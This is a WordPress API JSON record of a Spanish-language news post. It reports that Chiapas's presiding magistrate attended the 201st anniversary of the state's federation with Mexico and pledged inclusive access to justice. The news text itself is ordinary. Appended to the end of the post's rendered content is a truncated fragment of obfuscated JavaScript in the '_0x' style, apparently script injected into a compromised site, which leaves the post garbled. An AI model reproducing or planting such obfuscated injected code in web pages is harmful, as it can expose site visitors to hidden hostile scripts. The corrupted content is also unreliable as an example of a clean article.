{"id":24002,"date":"2025-09-15T04:13:24","date_gmt":"2025-09-15T04:13:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24002"},"modified":"2025-09-15T04:13:25","modified_gmt":"2025-09-15T04:13:25","slug":"refrenda-juan-carlos-moreno-guillen-compromiso-con-todas-las-voces-de-las-y-los-chiapanecos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24002","title":{"rendered":"Refrenda Juan Carlos Moreno Guill\u00e9n compromiso con todas las voces de las y los chiapanecos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868-1024x682.jpg\" alt=\"\" class=\"wp-image-24003\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000333868.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>En el Aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico, Poder Judicial reitera su labor por la paz y la inclusi\u00f3n en el acceso a la justicia.<\/li>\n<\/ul>\n\n\n\n<p>14 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Este 14 de septiembre, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, junto al gobernador Eduardo Ram\u00edrez Aguilar, asisti\u00f3 a la ceremonia conmemorativa del 201 Aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico.<\/p>\n\n\n\n<p>Este acto solemne, que fue un espacio de reflexi\u00f3n y reconocimiento de los hechos que forjaron los lazos hist\u00f3ricos de nuestra entidad con la naci\u00f3n mexicana, reuni\u00f3 a las y los servidores del pueblo y representantes de las Fuerzas Armadas, quienes manifestaron su compromiso por seguir contribuyendo a preservar nuestra identidad estatal y nuestra soberan\u00eda nacional.<\/p>\n\n\n\n<p>Asimismo, en este marco, el magistrado presidente Juan Carlos Moreno Guill\u00e9n reiter\u00f3 que el Poder Judicial continuar\u00e1 su misi\u00f3n de garantizar el acceso de justicia a las y los chiapanecos, trabajando desde un enfoque humanista que incluya a todas las voces, culturas e ideolog\u00edas, con la firme convicci\u00f3n de que la justicia es la paz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>En el Aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico, Poder Judicial reitera su labor por la paz y la inclusi\u00f3n en el acceso a la justicia. 14 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Este 14 de septiembre, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, junto al gobernador Eduardo Ram\u00edrez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24003,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24002","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24002","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24002"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24002\/revisions"}],"predecessor-version":[{"id":24004,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24002\/revisions\/24004"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24003"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24002"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24002"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}